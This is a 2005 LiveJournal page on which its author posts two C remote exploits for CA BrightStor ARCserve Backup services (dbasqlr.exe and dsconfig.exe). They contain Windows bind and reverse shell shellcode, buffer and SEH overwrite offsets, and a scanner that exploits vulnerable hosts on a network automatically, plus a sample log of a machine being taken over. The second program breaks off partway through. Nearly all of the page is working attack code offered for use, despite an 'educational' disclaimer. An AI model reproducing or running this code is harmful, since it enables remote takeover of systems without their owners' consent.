cybertronic's Journal
[Most Recent Entries]
[Calendar View]
[Friends]
Below are the 6 most recent journal entries recorded in
cybertronic's LiveJournal:
| Wednesday, August 3rd, 2005 | | 2:24 pm |
dbasqlr.exe remote exploit
/*
* CA BrightStor ARCserve Backup Agent for SQL - dbasqlr.exe
*
* cybertronic[at]gmx[dot]net
*
*/
#include
#include
#include
#include
#define PORT 6070
unsigned char bindshell[] =
"\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff\xff\xff\x81\x36\x80\xbf\x32"
"\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff"
"\x03\x53\x06\x1f\x74\x57\x75\x95\x80\xbf\xbb\x92\x7f\x89\x5a\x1a"
"\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09\xf9\x3a\x6b\xb6\xd7\x9f\x4d"
"\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6\xb3\x5a\xf8\xec\xbf\x32\xfc"
"\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf\xeb\xcd\xc2\x88\x36\x74\x90"
"\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad\xbe\x32\x94\x09\xf9\x22\x6b"
"\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81\xbf\x32\x1d\xc6\xab\xcd\xe2"
"\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81\xbf\x32\x1d\xc6\xa7\xcd\xe2"
"\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80\xbf\x32\x1d\xc6\xa3\xcd\xe2"
"\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80\xbf\x32\x1d\xc6\x9f\xcd\xe2"
"\x84\xd7\x96\x39\xae\x56\xda\x4a\x80\xbf\x32\x1d\xc6\x9b\xcd\xe2"
"\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80\xbf\x32\x1d\xc6\x97\xcd\xe2"
"\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80\xbf\x32\x1d\xc6\x93\x01\x6b"
"\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81\xbe\x32\x94\x7f\xe9\x2a\xc4"
"\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6\xa3\xb9\x4c\xd7\xe8\x5a\x96"
"\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3\x40\x64\xb4\xd7\xec\xcd\xc2"
"\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50\xd7\x57\xec\xe5\xbf\x5a\xf7"
"\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4\x32\x0e\xb0\xb3\x7f\x01\x5d"
"\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4\xaf\x76\x6a\xc4\x9b\x0f\x1d"
"\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4\x9b\x62\x19\xc4\x9b\x22\xc0"
"\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f\xc9\x02\xc5\x7f\xe9\x22\x1f"
"\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b\x77\x65\x6b\xd6\x93\xcd\xc2"
"\x94\xea\x64\xf0\x21\x8f\x32\x94\x80\x3a\xf2\xec\x8c\x34\x72\x98"
"\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89\x34\x72\xa0\x0b\x17\x8a\x94"
"\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80\xec\x67\xc2\xd7\x34\x5e\xb0"
"\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83\x6a\xb9\xde\x98\x34\x68\xb4"
"\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83\x4a\x01\x6b\x7c\x8c\xf2\x38"
"\xba\x7b\x46\x93\x41\x70\x3f\x97\x78\x54\xc0\xaf\xfc\x9b\x26\xe1"
"\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c\xf4\xb9\xce\x9c\xbc\xef\x1f"
"\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b\x6a\x6d\xca\xdd\xe4\xf0\x90"
"\x80\x2f\xa2\x04";
unsigned char reverseshell[] =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9"
"\x99\x99\x99\x12\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3"
"\x9D\xC0\x71\x02\x99\x99\x99\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE"
"\xEA\xAB\xC6\xCD\x66\x8F\x12\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99"
"\x7B\x60\x18\x75\x09\x98\x99\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF"
"\x89\xC9\xC9\xC9\xC9\xD9\xC9\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6"
"\x99\x99\x98\xF1\x9B\x99\x9D\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF"
"\x81\x1C\x59\xEC\xD3\xF1\xFA\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD"
"\x14\xA5\xBD\xF3\x8C\xC0\x32\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD"
"\xBD\xA4\x10\xC5\xBD\xD1\x10\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD"
"\xBD\x89\xCD\xC9\xC8\xC8\xC8\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66"
"\xCF\x9D\x12\x55\xF3\x66\x66\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66"
"\xCF\x95\xC8\xCF\x12\xDC\xA5\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB"
"\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3"
"\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3"
"\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D"
"\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x99\x66\x66\x66\x17\xD7\x97\x75"
"\xEB\x67\x2A\x8F\x34\x40\x9C\x57\x76\x57\x79\xF9\x52\x74\x65\xA2"
"\x40\x90\x6C\x34\x75\x60\x33\xF9\x7E\xE0\x5F\xE0";
void
exploit ( int s, unsigned long cbip, unsigned short cbport, int option )
{
unsigned long pushesp = 0x20c0c1ab;
char buffer[3289];
bzero ( &buffer, sizeof ( buffer ) );
memset ( buffer, 0x41, sizeof ( buffer ) - 1 );
memcpy ( buffer + 1337, "\x81\xc4\x54\xf2\xff\xff", 6 );
memcpy ( buffer + 3168, ( unsigned char* ) &pushesp, 4 );
memcpy ( buffer + 3172, "\xe9\xd0\xf8\xff\xff", 5 );
if ( option == 0 )
{
memcpy ( &reverseshell[111], &cbip, 4);
memcpy ( &reverseshell[118], &cbport, 2);
memcpy ( buffer + 1343, reverseshell, sizeof ( reverseshell ) - 1 );
}
else
memcpy ( buffer + 1343, bindshell, sizeof ( bindshell ) - 1 );
printf ( "attacking with %u bytes...", strlen ( buffer ) );
write ( s, buffer, strlen ( buffer ) );
printf ( "done!\n" );
close ( s );
}
int
main ( int argc, char* argv[] )
{
int s;
unsigned long cbip;
unsigned short cbport;
struct sockaddr_in remote_addr;
struct hostent* host_addr;
if ( argc != 2 )
if ( argc != 4 )
{ fprintf ( stderr, "Usage\n-----\n[bindshell] %s \n[reverseshell] %s \n", argv[0], argv[0] ); exit ( 1 ); }
if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL )
{ fprintf ( stderr, "Cannot resolve hostname: %s\n", argv[1] ); exit ( 1 ); }
remote_addr.sin_family = AF_INET;
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
remote_addr.sin_port = htons ( PORT );
s = socket ( AF_INET, SOCK_STREAM, 0 );
printf ( "connecting to %s:%u...", argv[1], PORT );
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
{ printf ( "failed!\n" ); exit ( 1 ); }
printf ( "ok!\n" );
if ( argc == 4 )
{
cbip = inet_addr ( argv[2] ) ^ ( unsigned long ) 0x99999999;
cbport = htons ( atoi ( argv[3] ) ) ^ ( unsigned short ) 0x9999;
exploit ( s, cbip, cbport, 0 );
}
else
exploit ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 );
}
| | 2:19 pm |
Greetz to CA
/*
* 02/20/2005
*
* This is provided as proof-of-concept code only for educational
* purposes and testing by authorized individuals with permission
* to do so.
*
* exploit by : cybertronic
*
* cybertronic[at]gmx[dot]net
*
* This exploits the following vulnerabilities:
*
* Computer Associates BrightStor ARCserve Backup Agent for SQL - dbasqlr.exe
* Computer Associates BrightStor ARCserve Backup Discovery Service - dsconfig.exe
*
* I included a vulnerability scanner, that scans for the bugs mentioned above
* and logs to "scan.log" in working directory.
* You have to adjust the timeout, it works fine on my network with
* usec = 10000: ~10 hosts / sec
*
* some greetz fly to:
* HD Moore - I`ll pay you some drinks, you know what they are for ;)
* houseofdabus
*
* compile: gcc -o greetz_to_ca greetz_to_ca.c
*
* below is a screenshot of scan-mode:
* __ __ _
* _______ __/ /_ ___ _____/ /__________ ____ (_)____
* / ___/ / / / __ \/ _ \/ ___/ __/ ___/ __ \/ __ \/ / ___/
* / /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__
* \___/\__, /_.___/\___/_/ \__/_/ \____/_/ /_/_/\___/
* /____/
*
* --[ exploit by : cybertronic - cybertronic[at]gmx[dot]net
*
* --[ choose
* |
* |--[0] = start scanner
* `--[1] = send some greetings to ca
*
* $ 0
*
* --[ enter IP-range
* |
* |--[start-ip] $ 192.168.2.90
* `--[end-ip ] $ 192.168.2.120
*
* --[ select port to scan for
* |
* |--[ 6070] = dbasqlr
* `--[41523] = dsconfig
*
* $ 6070
*
* --[ I can try to exploit the bug, shall I ?
* |
* |--[0] yes, try it!
* `--[1] no, i`am on my own!
*
* $ 0
*
* --[ select shellcode
* |
* |--[0] = bindshell
* `--[1] = reverseshell
*
* $ 0
*
* oO---[ scanner - scan.log ]---Oo
*
* [192.168.2.90:6070] closed
* [192.168.2.91:6070] closed
* [192.168.2.92:6070] closed
* [192.168.2.93:6070] closed
* [192.168.2.94:6070] closed
* [192.168.2.95:6070] closed
* [192.168.2.96:6070] closed
* [192.168.2.97:6070] closed
* [192.168.2.98:6070] closed
* [192.168.2.99:6070] closed
* [192.168.2.100:6070] closed
* [192.168.2.101:6070] open
*
// the first one is a fake service that was running by accident ( netcat -l -p 6070 )
* oO---[ exploitation ]---Oo
*
* --[ connecting to 192.168.2.101:6070...done!
* --[ exploiting dbasqlr.exe...
* --[ sending packet [ 3288 bytes ]...done!
* --[ sleeping 5 seconds...
* --[ connecting to 192.168.2.101:4444...failed!
*
* [192.168.2.102:6070] open
*
* oO---[ exploitation ]---Oo
*
* --[ connecting to 192.168.2.102:6070...done!
* --[ exploiting dbasqlr.exe...
* --[ sending packet [ 3288 bytes ]...done!
* --[ sleeping 5 seconds...
* --[ connecting to 192.168.2.102:4444...done!
* --[ b0x pwned - h4ve phun
* Microsoft Windows XP [Version 5.1.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
* C:\WINDOWS\system32>exit
* exit
* bye bye...
* [192.168.2.103:6070] closed
* [192.168.2.104:6070] closed
* [192.168.2.105:6070] closed
* [192.168.2.106:6070] closed
* [192.168.2.107:6070] closed
* [192.168.2.108:6070] closed
* [192.168.2.109:6070] closed
* [192.168.2.110:6070] closed
* [192.168.2.111:6070] closed
* [192.168.2.112:6070] closed
* [192.168.2.113:6070] closed
* [192.168.2.114:6070] closed
* [192.168.2.115:6070] closed
* [192.168.2.116:6070] closed
* [192.168.2.117:6070] closed
* [192.168.2.118:6070] closed
* [192.168.2.119:6070] closed
* [192.168.2.120:6070] closed
*
* oO---[ scan completed ]---Oo
*
* [ cybertronic @ CA ] #
*
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
/*
*
* definitions
*
*/
#define PORT_DBASQLR 6070
#define PORT_DSCONFIG 41523
#define RED "\E[31m\E[1m"
#define GREEN "\E[32m\E[1m"
#define YELLOW "\E[33m\E[1m"
#define BLUE "\E[34m\E[1m"
#define NORMAL "\E[m"
/*
*
* prototypes
*
*/
int connect_to_remote_host ( char* tip, unsigned short tport );
int exploit_dbasqlr ( int s, unsigned long xoredip, unsigned short xoredcbport, int option );
int exploit_dsconfig ( int s, unsigned long xoredip, unsigned short xoredcbport, int option );
int isip ( char *ip );
int is_open ( char* ip, unsigned short tport );
int select_action ();
int select_shellcode ();
int select_vulnerability ();
int shell ( int s, char* tip, unsigned short cbport );
void connect_to_bindshell ( char* tip, unsigned short bport );
void fall_asleep ( int sec );
void header ();
void start_reverse_handler ( int cbport );
void usage ( char* name );
/*********************
* Windows Shellcode *
*********************/
/*
* Type : bind shellcode
* Length: 500 bytes
* Port : 4444 / 0x115c
*
*/
unsigned char bindshell[] =
"\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff\xff\xff\x81\x36\x80\xbf\x32"
"\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff"
"\x03\x53\x06\x1f\x74\x57\x75\x95\x80\xbf\xbb\x92\x7f\x89\x5a\x1a"
"\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09\xf9\x3a\x6b\xb6\xd7\x9f\x4d"
"\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6\xb3\x5a\xf8\xec\xbf\x32\xfc"
"\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf\xeb\xcd\xc2\x88\x36\x74\x90"
"\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad\xbe\x32\x94\x09\xf9\x22\x6b"
"\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81\xbf\x32\x1d\xc6\xab\xcd\xe2"
"\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81\xbf\x32\x1d\xc6\xa7\xcd\xe2"
"\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80\xbf\x32\x1d\xc6\xa3\xcd\xe2"
"\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80\xbf\x32\x1d\xc6\x9f\xcd\xe2"
"\x84\xd7\x96\x39\xae\x56\xda\x4a\x80\xbf\x32\x1d\xc6\x9b\xcd\xe2"
"\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80\xbf\x32\x1d\xc6\x97\xcd\xe2"
"\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80\xbf\x32\x1d\xc6\x93\x01\x6b"
"\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81\xbe\x32\x94\x7f\xe9\x2a\xc4"
"\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6\xa3\xb9\x4c\xd7\xe8\x5a\x96"
"\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3\x40\x64\xb4\xd7\xec\xcd\xc2"
"\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50\xd7\x57\xec\xe5\xbf\x5a\xf7"
"\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4\x32\x0e\xb0\xb3\x7f\x01\x5d"
"\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4\xaf\x76\x6a\xc4\x9b\x0f\x1d"
"\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4\x9b\x62\x19\xc4\x9b\x22\xc0"
"\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f\xc9\x02\xc5\x7f\xe9\x22\x1f"
"\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b\x77\x65\x6b\xd6\x93\xcd\xc2"
"\x94\xea\x64\xf0\x21\x8f\x32\x94\x80\x3a\xf2\xec\x8c\x34\x72\x98"
"\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89\x34\x72\xa0\x0b\x17\x8a\x94"
"\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80\xec\x67\xc2\xd7\x34\x5e\xb0"
"\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83\x6a\xb9\xde\x98\x34\x68\xb4"
"\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83\x4a\x01\x6b\x7c\x8c\xf2\x38"
"\xba\x7b\x46\x93\x41\x70\x3f\x97\x78\x54\xc0\xaf\xfc\x9b\x26\xe1"
"\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c\xf4\xb9\xce\x9c\xbc\xef\x1f"
"\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b\x6a\x6d\xca\xdd\xe4\xf0\x90"
"\x80\x2f\xa2\x04";
/*
* Type : connect back shellcode
* Length: 316 bytes
* CBIP : reverseshell[111] ( ^ 0x99999999 )
* CBPort: reverseshell[118] ( ^ 0x9999 )
*
*/
unsigned char reverseshell[] =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9"
"\x99\x99\x99\x12\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3"
"\x9D\xC0\x71\x02\x99\x99\x99\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE"
"\xEA\xAB\xC6\xCD\x66\x8F\x12\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99"
"\x7B\x60\x18\x75\x09\x98\x99\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF"
"\x89\xC9\xC9\xC9\xC9\xD9\xC9\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6"
"\x99\x99\x98\xF1\x9B\x99\x9D\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF"
"\x81\x1C\x59\xEC\xD3\xF1\xFA\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD"
"\x14\xA5\xBD\xF3\x8C\xC0\x32\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD"
"\xBD\xA4\x10\xC5\xBD\xD1\x10\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD"
"\xBD\x89\xCD\xC9\xC8\xC8\xC8\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66"
"\xCF\x9D\x12\x55\xF3\x66\x66\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66"
"\xCF\x95\xC8\xCF\x12\xDC\xA5\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB"
"\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3"
"\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3"
"\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D"
"\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x99\x66\x66\x66\x17\xD7\x97\x75"
"\xEB\x67\x2A\x8F\x34\x40\x9C\x57\x76\x57\x79\xF9\x52\x74\x65\xA2"
"\x40\x90\x6C\x34\x75\x60\x33\xF9\x7E\xE0\x5F\xE0";
unsigned char greetz[] =
"\x20\x41\x54\x20\x4c\x45\x41\x53\x54\x20\x53\x4f\x4d\x45\x20\x47"
"\x52\x45\x45\x54\x5a\x20\x46\x4c\x59\x20\x54\x4f\x3a\x20\x48\x44"
"\x4d\x2c\x20\x54\x48\x43\x2c\x20\x41\x4e\x44\x20\x43\x41\x20\x4f"
"\x46\x20\x43\x4f\x55\x52\x53\x45\x20\x3a\x29\x20\x2d\x20\x43\x59"
"\x42\x45\x52\x54\x52\x4f\x4e\x49\x43\x20";
/*
*
* structures
*
*/
typedef struct _args {
char* tip;
char* lip;
int tport;
int lport;;
} args;
/*
*
* functions
*
*/
int
connect_to_remote_host ( char* tip, unsigned short tport )
{
int s;
struct sockaddr_in remote_addr;
struct hostent* host_addr;
memset ( &remote_addr, 0x0, sizeof ( remote_addr ) );
if ( ( host_addr = gethostbyname ( tip ) ) == NULL )
{
printf ( "cannot resolve \"%s\"\n", tip );
exit ( 1 );
}
remote_addr.sin_family = AF_INET;
remote_addr.sin_port = htons ( tport );
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "socket failed!\n" );
exit ( 1 );
}
printf ( "--[ connecting to %s:%u...", tip, tport );
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
{
printf ( "failed!\n" );
exit ( 1 );
}
printf ( "done!\n" );
return ( s );
}
int
exploit_dbasqlr ( int s, unsigned long xoredip, unsigned short xoredcbport, int option )
{
unsigned long pushesp = 0x20c0c1ab; //Asbrdcst.dll
char buffer[3289];
bzero ( &buffer, sizeof ( buffer ) );
memset ( buffer, 0x41, sizeof ( buffer ) - 1 );
memcpy ( buffer + 14, greetz, sizeof ( greetz ) - 1 );
memcpy ( buffer + 1337, "\x81\xc4\x54\xf2\xff\xff", 6 ); //good code <-------.
memcpy ( buffer + 3168, ( unsigned char* ) &pushesp, 4 ); // |
memcpy ( buffer + 3172, "\xe9\xd0\xf8\xff\xff", 5 ); //jmp back 1840 bytes --'
if ( option == 0 )
{
memcpy ( &reverseshell[111], &xoredip, 4);
memcpy ( &reverseshell[118], &xoredcbport, 2);
memcpy ( buffer + 1343, reverseshell, sizeof ( reverseshell ) - 1 );
}
else
memcpy ( buffer + 1343, bindshell, sizeof ( bindshell ) - 1 );
printf ( "--[ exploiting " YELLOW "dbasqlr.exe" NORMAL"...\n" );
printf ( "--[ sending packet [ %u bytes ]...", strlen ( buffer ) );
if ( write ( s, buffer, strlen ( buffer ) ) <= 0 )
{
printf ( RED "failed!\n" NORMAL);
return ( 1 );
}
printf ( YELLOW "done!\n" NORMAL);
sleep ( 1 );
close ( s );
return ( 0 );
}
int
exploit_dsconfig ( int s, unsigned long xoredip, unsigned short xoredcbport, int option )
{
char buffer[4129];
bzero ( &buffer, sizeof ( buffer ) );
memset ( buffer, 0x41, sizeof ( buffer ) - 1 );
buffer[ 0] = 0x9b;
buffer[ 1] = 0x53; //S
buffer[ 2] = 0x45; //E
buffer[ 3] = 0x52; //R
buffer[ 4] = 0x56; //V
buffer[ 5] = 0x49; //I
buffer[ 6] = 0x43; //C
buffer[ 7] = 0x45; //E
buffer[ 8] = 0x50; //P
buffer[ 9] = 0x43; //C
buffer[10] = 0x18;
buffer[11] = 0x01;
buffer[12] = 0x02;
buffer[13] = 0x03;
buffer[14] = 0x04;
buffer[15] = 0x53; //S
buffer[16] = 0x45; //E
buffer[17] = 0x52; //R
buffer[18] = 0x56; //V
buffer[19] = 0x49; //I
buffer[20] = 0x43; //C
buffer[21] = 0x45; //E
buffer[22] = 0x50; //P
buffer[23] = 0x43; //C
buffer[24] = 0x01;
buffer[25] = 0x0c;
buffer[26] = 0x6c;
buffer[27] = 0x93;
buffer[28] = 0xce;
buffer[29] = 0x18;
buffer[30] = 0x18;
memcpy ( buffer + 14, greetz, sizeof ( greetz ) - 1 );
memcpy ( buffer + 1056, "\xeb\x06", 2 );
memcpy ( buffer + 1060, "\x14\x57\x80\x23", 4 ); //SEH
if ( option == 0 )
{
memcpy ( &reverseshell[111], &xoredip, 4);
memcpy ( &reverseshell[118], &xoredcbport, 2);
memcpy ( buffer + 1064, reverseshell, sizeof ( reverseshell ) - 1 );
}
else
memcpy ( buffer + 1064, bindshell, sizeof ( bindshell ) - 1 );
printf ( "--[ exploiting " YELLOW "dsconfig.exe" NORMAL "...\n" );
printf ( "--[ sending packet [ %u bytes ]...", strlen ( buffer ) );
if ( write ( s, buffer, strlen ( buffer ) ) <= 0 )
{
printf ( RED "failed!\n" NORMAL);
return ( 1 );
}
printf ( YELLOW "done!\n" NORMAL);
sleep ( 1 );
close ( s );
return ( 0 );
}
int
isip ( char *ip )
{
int a, b, c, d;
if ( !sscanf ( ip, "%d.%d.%d.%d", &a, &b, &c, &d ) )
return ( 0 );
if ( a < 1 )
return ( 0 );
if ( a > 255 )
return 0;
if ( b < 0 )
return 0;
if ( b > 255 )
return 0;
if ( c < 0 )
return 0;
if ( c > 255 )
return 0;
if ( d < 0 )
return 0;
if ( d > 255 )
return 0;
return 1;
}
int
is_open ( char* ip, unsigned short tport )
{
int s, n, error;
int flags;
int sec = 0; //change this for wan
unsigned long usec = 10000; //works fine on my lan
struct sockaddr_in remote_addr;
struct timeval tval;
fd_set rset, wset;
socklen_t len;
memset ( &remote_addr, 0x0, sizeof ( remote_addr ) );
remote_addr.sin_family = AF_INET;
remote_addr.sin_port = htons ( tport );
inet_pton ( AF_INET, ip, &remote_addr.sin_addr );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "socket failed!\n" );
exit ( -1 );
}
if ( ( flags = fcntl ( s, F_GETFL, 0 ) ) < 0 )
{
close ( s );
return ( -1 );
}
if ( fcntl ( s, F_SETFL, flags | O_NONBLOCK ) < 0 )
{
close ( s );
return ( -1 );
}
if ( ( n = connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) ) == -1 )
{
if ( errno != EINPROGRESS )
{
close ( s );
return ( -1 );
}
}
if ( n == 0 )
goto done; /* connect completed immediately */
FD_ZERO ( &rset );
FD_SET ( s, &rset );
wset = rset;
tval.tv_sec = sec;
tval.tv_usec = usec;
if ( ( n = select ( s + 1, &rset, &wset, NULL, &tval ) ) == 0 )
{
close ( s ); /* timeout */
errno = ETIMEDOUT;
return ( 1 );
}
if ( FD_ISSET ( s, &rset ) || FD_ISSET ( s, &wset ) )
{
len = sizeof ( error );
if ( getsockopt ( s, SOL_SOCKET, SO_ERROR, &error, &len ) < 0 )
return ( -1 );
}
else
{
printf ( "select failed!\n" );
exit ( 1 );
}
done:
if ( fcntl ( s, F_SETFL, flags ) < 0 )
{
close ( s );
return ( -1 );
}
if ( error )
{
close ( s );
errno = error;
return ( -1 );
}
return ( 0 );
}
int
select_action ()
{
int ret;
printf ( "\n" );
printf ( "--[ choose\n" );
printf ( " |\n" );
printf ( " |--" RED "[" NORMAL "0" RED "]" NORMAL " = start scanner\n" );
printf ( " `--" RED "[" NORMAL "1" RED "]" NORMAL " = send some greetings to ca\n" );
printf ( "\n" );
printf ( " $ " );
scanf ( "%d", &ret );
if ( ret != 0 && ret != 1 )
{
printf ( "--[ invalid option!\n" );
exit ( 1 );
}
return ( ret );
}
int
select_shellcode ()
{
int ret;
printf ( "\n" );
printf ( "--[ select shellcode\n" );
printf ( " |\n" );
printf ( " |--" RED "[" NORMAL "0" RED "]" NORMAL " = bindshell\n" );
printf ( " `--" RED "[" NORMAL "1" RED "]" NORMAL " = reverseshell\n" );
printf ( "\n" );
printf ( " $ " );
scanf ( "%d", &ret );
if ( ret != 0 && ret != 1 )
{
printf ( "--[ invalid shellcode!\n" );
exit ( 1 );
}
return ( ret );
}
int
select_vulnerability ()
{
int ret;
printf ( "\n" );
printf ( "--[ select vulnerability\n" );
printf ( " |\n" );
printf ( " |--" RED "[" NORMAL "0" RED "]" NORMAL " = dbasqlr\n" );
printf ( " `--" RED "[" NORMAL "1" RED "]" NORMAL " = dsconfig\n" );
printf ( "\n" );
printf ( " $ " );
scanf ( "%d", &ret );
if ( ret != 0 && ret != 1 )
{
printf ( "--[ invalid option!\n" );
exit ( 1 );
}
return ( ret );
}
int
shell ( int s, char* tip, unsigned short cbport )
{
int n;
char buffer[2048];
fd_set fd_read;
printf ( "--[" YELLOW " b" NORMAL "0" YELLOW "x " NORMAL "p" YELLOW "w" NORMAL "n" YELLOW "e" NORMAL "d " YELLOW "- " NORMAL "h" YELLOW "4" NORMAL "v" YELLOW "e " NORMAL "p" YELLOW "h" NORMAL "u" YELLOW "n" NORMAL "\n" );
FD_ZERO ( &fd_read );
FD_SET ( s, &fd_read );
FD_SET ( 0, &fd_read );
while ( 1 )
{
FD_SET ( s, &fd_read );
FD_SET ( 0, &fd_read );
if ( select ( s + 1, &fd_read, NULL, NULL, NULL ) < 0 )
break;
if ( FD_ISSET ( s, &fd_read ) )
{
if ( ( n = recv ( s, buffer, sizeof ( buffer ), 0 ) ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
if ( write ( 1, buffer, n ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
}
if ( FD_ISSET ( 0, &fd_read ) )
{
if ( ( n = read ( 0, buffer, sizeof ( buffer ) ) ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
if ( send ( s, buffer, n, 0 ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
}
usleep(10);
}
}
void
connect_to_bindshell ( char* tip, unsigned short bport )
{
int s;
int sec = 5; // change this for fast targets
struct sockaddr_in remote_addr;
struct hostent* host_addr;
if ( ( host_addr = gethostbyname ( tip ) ) == NULL )
{
fprintf ( stderr, "cannot resolve \"%s\"\n", tip );
exit ( 1 );
}
remote_addr.sin_family = AF_INET;
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
remote_addr.sin_port = htons ( bport );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "socket failed!\n" );
exit ( 1 );
}
printf ( "--[ sleeping %d seconds...\n", sec );
fall_asleep ( sec );
printf ( "--[ connecting to %s:%u...", tip, bport );
